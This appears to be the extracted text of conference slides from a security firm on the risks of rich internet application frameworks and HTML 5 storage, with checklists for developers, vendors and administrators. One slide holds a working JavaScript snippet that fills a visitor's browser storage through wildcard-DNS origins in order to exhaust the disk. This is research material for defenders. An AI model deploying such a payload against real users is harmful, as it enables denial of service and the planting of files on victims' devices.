Firefox 3Additional funLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSpeaking of tracking and data storage. . .Did you have History turned off? FF3 turned it back on.Also new in FF3: nsIdleService — idle tracking throughXPCOMEXSLT — eXtensible Stylesheet LanguageTransformations weren’t extensible enough, so here are theextensions.Websites can now be protocol handlers — a novel way toimplement spyware

WebkitThe Lurking MenaceLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webUsed in Safari, iPhone, Android, OpenMoko, KonquerorSupports HTML 5 DOM storage mechanismsParticularly crucial on mobile devices, where storage is at apremium

Inherent DoS Risks in HTML 5Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web5M per origin for database objects5M per origin for localStorage5M per origin for globalStorage (in Firefox)Thankfully, no one has hundreds of thousands of originsExcept people on internal class A networksOr anyone with wildcard DNSTrivial storage exhaustion attacks possibleEven more so for mobile devices based on WebKit — plus,storage and RAM are often pooled on theseNo exposed UI to disable this

DoS Risks in HTML 5Attack ScenariosLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAttacker sets up or compromises web server with wildcardDNSUpon page visitation of the main virtual host, an IFRAMEloads which runs Javascript like this:f u n c t i o n s t o r e t h i n g s ( name ) {g l o b a l S t o r a g e [ ’ c y b e r v i l l a i n s . org ’ ] [ name ] = "Hi there , from iSEC !" ;}f u n c t i o n mul0 ( s t r , num) {i f ( ! num) r e t u r n "" ;v a r newStr = s t r ;w h i l e (−−num) newStr += s t r ;r e t u r n newStr ;}v a r i = 0 ;w h i l e ( i < 10000) {whee = mul0 ( "A" ,10000) ;s t o r e t h i n g s ( whee + i ) ;i ++;}

DoS Risks in HTML 5Attack ScenariosLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webEach request loads a page instantiating globalStorageand/or localStorage and database objectsFill the victim’s hard drive with incriminating evidence —base64-encoded images/files, etc. . .

Other HTML 5 features not yet implementedComing soon to a browser near youLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webTCP Connections! Direct ones and broadcast.Section 7.3.8, Security: “Need to write this section.” 11 http://www.w3.org/html/wg/html5/

RIA vs OSStorageLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAll of these frameworks expand the capabilities to storedata locallyIntroduce privacy/tracking concernsDoS risk against desktops and mobile devices

RIA vs OSMalwareLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAdobe AIR is a desktop application frameworkAIR can easily seed malwareThe effectiveness of malware attacks will be directlyrelated to the popularity of the platform and the ease ofinstallLarge media attack surfaces pose another option

RIA vs the webOr vice versaLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webMost RIA frameworks and HTML 5 include mechanismsfor SQL-based storageXSS now has access to huge, easily retrievable data stores,often pre-loginRetrieving query parameters from untrusted sources cannow leads to SQL injectionCSRF from the RIA app to the browser usually stillpossibleSilverlight and AIR accept input from calling sites, openingFlash-like XSS and XSF vulns

RIA Developer ChecklistLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&APrevent predictably named data stores — use a per-userGUID embedded in dynamically generated pageParameterize SQL statementsLock your AIR app to your domain if possibleBeware of passed-in arguments. Don’t use them inJavaScript or to fetch URLsBe very careful with sandbox bridging. Don’t get cuteabout bypassing AIR security modelUse Flex or Flash if you don’t need local power of AIR. . . and you probably don’t

RIA Framework VendorsLocal Storage SecurityLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&ALet users opt out.User choice is missing hereCookies have been opt-out for ages, but other trackingmechanisms haven’t caught upLimit storage invocations5M per origin is way too much without user interaction,especially on mobile devices

RIA Framework VendorsInstall MechanismsLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&ALearn from Microsoft’s mistakesThey invented RIA with ActiveXAdvantage: MalwareBad guys can get certs. We have a code signing cert fromVerisign, and we’re professional bad guys

RIA Framework VendorsInstall MechanismsLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&AUsers will click yes enough to invite abuseDo not allow self-signed anything without setting anexternal developer bitInstall needs to take longerWatch out for install window DoSing to force a “yes”Using .exe download and install as baseline is notacceptableRIA frameworks need an equivalent to ActiveX killbits

RIA Framework VendorsAttack SurfacesLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&ARIA Frameworks are expanding security attack surfaceAudio codecsVideo codecsIL Parser / Virtual MachineEmbedded HTML renderer, JavaScript engine, imagelibrariesUsers do not understand the dangerToo many exploits will lead to backlash, mass uninstall

Users and AdministratorsAdvice for Corporate AdminsLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&ADisallow install of RIA frameworks without legitimatebusiness needFor Windows, GPO can disable per CLSIDOnce installed, IEAK becomes useless in enforcing policy inalternative installersDiscourage development teams from using RIAunnecessarilyUnderstand local framework settings that you can setremotelyDisable self-signed AIR installBlock blobs at border proxy if necessary

Users and AdministratorsAdvice for Normal PeopleLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&ADon’t install frameworks you don’t needUse NoScript or equivalent to block JS/Flash/Silverlightinstantiation except when you want itRead install boxes carefullyBuy gold, guns, and canned food

Living in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&A

SummaryLiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&ARIA frameworks widely differ in their security modelsIt is highly likely that web developers will introduceinteresting flaws into their desktop applicationsThe Web is becoming less standardized, more complex,and much more dangerousTo Be DoneAutomated auditing tools for these frameworks arenecessaryDetailed per-framework checklists need to be createdPlenty of bugs to find for everyone

Q&ALiving in theRIA WorldSecurityChecklistRIA DevelopersRIA FrameworkVendorsUsers andAdministratorsSummaryQ&AThanks for coming!Questions?https://www.isecpartners.com

For Further ReadingLiving in theRIA WorldAppendixFor FurtherReadingLutz Roeder.Reflector for .NEThttp://www.aisto.com/roeder/dotnet/Kevin Kelly, Gary WolfKiss your browser goodbye: The radical future of mediabeyond the WebWired 5.03. March, 1997Ian Hickson, David HyattA vocabulary and associated APIs for HTML and XHTMLhttp://www.w3.org/html/wg/html5/ — July 1 2008